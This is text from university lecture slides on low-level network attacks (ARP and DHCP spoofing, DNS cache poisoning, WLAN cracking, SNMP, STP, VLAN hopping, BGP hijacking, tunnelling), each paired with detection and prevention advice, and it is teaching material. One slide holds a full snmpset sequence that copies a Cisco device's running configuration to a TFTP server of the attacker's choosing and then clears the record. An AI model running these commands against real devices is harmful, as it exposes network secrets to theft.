Jeroen van Beek
1
Why bother? Popular / interesting attacks Now what? Questions?
2
Low-level attacks can be very dangerous◦ In many cases difficult to detect / prevent in higher
OSI levels
3
4
Passive attack Works on non-switched networks◦ Including WLAN
Find interesting information◦ Plain text services◦ HTTP logins (see lab assignment)◦ SNMP◦ Telnet (still used in some environments!)◦ Password hashes (‘pass the hash’)
Detection and prevention◦ Use switched networks
5
Active attack Switched environments only show broadcast /
multicast traffic Overflow CAM tables◦ Switch will forward traffic to all ports◦ See dnsniff’s macof
https://www.monkey.org/~dugsong/dsniff/
Detection and prevention◦ Limit the number of MACs per switch port Monitor or auto shutdown
6
Using a forged source IP address to◦ Impersonating other systems
Targets◦ UDP services◦ TCP services with predictable characteristics◦ DoS
7
Oldskewl problem Weak authentication mechanisms using UDP◦ Add your system to the list of trusted systems using a
spoofed packet
More difficult to exploit for TCP services◦ Because of handshaking◦ However not impossible with TCP sequence prediction
However old mistakes are made again◦ Everything over IP◦ Burglar alarm over UDP Including status messages and switching the system off
8
Kaminsky DNS Spoofing◦ Attacker’s website contains link to x.domain.com E.g. an image
◦ Target’s DNS server resolves x.domain.com◦ The attacker knows this and sends replies with fake
records to the target UDP, query ID (QID) identifies reply QID is 16 bit value (65.536) possibilities: send all Include forged referral for domain.com for cache poison
◦ domain.com point to IP of attacker’s choice◦ http://www.blackhat.com/presentations/bh-jp-08/bh-jp-08-
Kaminsky/BlackHat-Japan-08-Kaminsky-DNS08-BlackOps.pdf
9
Mainly used for DoS attacks Increasing efficiency◦ NTP monlist◦ SNMP◦ DNS: ANY query DNSSEC
Send one spoofed packet to broadcast address◦ Many hosts / services reply to spoofed address◦ So called ‘smurf attack’
10
11
Detection◦ Check source IPs IDS
Prevention◦ Do not use source IPs for authentication purposes ◦ Do not use UDP for (indirect) authentication purposes◦ Ingress / egress filtering Drop spoofed packets RFC 2827
12
Used to become a man in the middle Attacker answers clients before the real
server does◦ Provide client with fake DNS servers / gateway / ...
Monitor / modify traffic Detection and prevention◦ Several tools out there for detection: Network devices: DHCP snooping, UNIX: dhcp_probe,
Windows: dhcploc Shutdown unused network ports
◦ Lockdown client PCs
13
Ethernet attack, both for wired and wireless Fake an ARP address to become a man in the
middle
14
Find interesting information◦ Plain text services◦ Password hashes
Use MITM exploits for specific services◦ E.g. SSHv1, HTTPS, POPS, IMAPS, SIPS, RDP
Sophisticated tools are available, automating MITM, sniffing and cracking◦ Ettercap https://github.com/Ettercap/ettercap Sed for network traffic
◦ Cain & Abel http://www.oxid.it/cain.html http://www.youtube.com/watch?v=BXPqq_XQZu8
15
16
Detection and prevention◦ Network devices: ARP inspection◦ Limit the number of MACs per switch port Monitor or auto shutdown
17
In most cases no device authentication In many cases shared secrets◦ WEP (still used for e.g. legacy industrial applications)◦ WPA PSK (‘pre shared keys’)◦ One key to own them all!
Flaws in crypto◦ WEP◦ WPA TKIP◦ WPS
18
Attacking isolated wireless networks◦ High power adapters◦ High gain antennas
Attacking crypto◦ Weaknesses allow an attacker to retrieve secret key◦ Aircrack-ng http://www.aircrack-ng.org/◦ After retrieving the key it’s a virtual plain network cable
Attacking passwords◦ Defaults◦ Easy-to-guess / crack◦ MAC derived
https://www.usenix.org/system/files/conference/woot15/woot15-paper-lorente.pdf
◦ Jam signal first to trigger association messages
19
20
21
Attacking OS functionality◦ Popular OSs store WLAN settings◦ Device tries to find the SSIDs automatically◦ Set up your own access point Forward traffic to real access point
◦ MITM
Detection and prevention◦ Detection of rogue APs◦ Prevent problems by hardening wireless equipment
and by using proven technologies IEEE 802.1x AES encryption
22
Many protocols are used for network management◦ Simple Network Management Protocol (SNMP)
Spanning Tree Protocol (STP)◦ Cisco Discovery Protocol (CDP)◦ Hot Standby Router Protocol (HSRP)◦ …
Most are OSI layer 2 based Most are designed with availability in mind◦ Weak / no security features
Many are enabled by default
23
Example: SNMP◦ Uses ‘community strings’ Some kind of secret password Read-only and read-write Defaults: ‘public’ and ‘private’
◦ Attacks Guess / brute force community string Most OSs: information leakage (accounts, routing) Cisco: dump config
24
25
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1
#The ConfigCopyProtocol is set to TFTP
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 4
#Set the SourceFileType to running-config
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 1
#Set the DestinationFileType to networkfile
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a <TFTP IP>
#Sets the ServerAddress to the IP address of the TFTP server
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s <Filename>
#Sets the CopyFilename to your desired file name.
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1
#Sets the CopyStatus to active which starts the copy process.
snmpset -c <community> -v 1 <device> 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6
#Sets the CopyStatus to delete which cleans all saved information out of the MIB
26
Example: Spanning Tree Protocol◦ Used for redundancy◦ Takes care of topology changes Broken network links
Network loops
Malfunctioning network devices
◦ One device is the ‘root’ The root can trigger a reconfiguration
◦ During reconfiguration all devices act like a hub Sniffing
◦ No security features in the protocol Become the root and reconfigure the network in such a way
that all traffic pass through your system
27
28
Detection◦ Monitor topology changes In practice: ?
Prevention◦ IP based: ACLs◦ Use security features of network equipment◦ Never use network management protocol on access
ports of end-users◦ Disable all unneeded management protocols
29
Connect to other – less restrictive - VLANs◦ In many cases supported built-in in driver◦ Fancy tools available to make attacks easy to perform, e.g.
(ab)using misconfigured network management protocols: http://www.yersinia.net/
https://github.com/nccgroup/vlan-hopping---frogger
Detection◦ Not needed, just prevent it
Prevention◦ Disable trunk negotiation◦ Configure ports as access ports◦ Don’t use VLAN1
30
Used for core routing on the internet◦ Autonomous Systems (AS) advertize IP ranges that
are reachable using their routers
Become an AS and start peering Advertize IP ranges that aren’t yours◦ Traffic is routed via your systems◦ Sniffing, MITM◦ Happens accidently and on purpose
31
Attacks◦ http://www.blackhat.com/presentations/bh-
europe-09/Rey_Mende/BlackHat-Europe-2009-Mende-Rey-All-Your-Packets-slides.pdf◦ http://www.blackhat.com/docs/us-
15/materials/us-15-Gavrichenkov-Breaking-HTTPS-With-BGP-Hijacking-wp.pdf
Detection◦ Monitoring: https://bgpmon.net/
Prevention◦ RPKI?
34
Abuse authorized protocols to open unauthorized communication channels◦ TCP over ICMP Ptunnel @ http://www.cs.uit.no/~daniels/PingTunnel/
◦ Tunnel IP over DNS Iodine @ http://code.kryo.se/iodine/
◦ Tunnel IP over … Everything!
◦ See https://www.os3.nl/_media/2005-2006/rp1/ms_mk_report.pdf, http://www.delaat.net/rp/2014-2015/p98/report.pdf and recent OT projects
35
36
37
Detection◦ Lab assignment!
Prevention◦ Lab assignment!
38
Sensitive information might also use other networks◦ DECT, GSM, Bluetooth, …
Those are not covered in this talk◦ However: be aware of the risks!
More and more phones and tablets are part of the network…◦ Are they (also) well-protected against the attacks
we’ve seen earlier today?
39
Detection:◦ Detection of well-known attacks using IDS
Prevention:◦ Don’t trust the network! ◦ Shutdown all unused ports◦ Enforce the use of safe protocols Problems on lower OSI levels shouldn’t affect the
security level of applications
There’s more than (wireless) Ethernet◦ Be aware of other technologies that provide access
to sensitive information DECT, GSM, VoIP, …
40
J.C.vanBeek uva.nl
41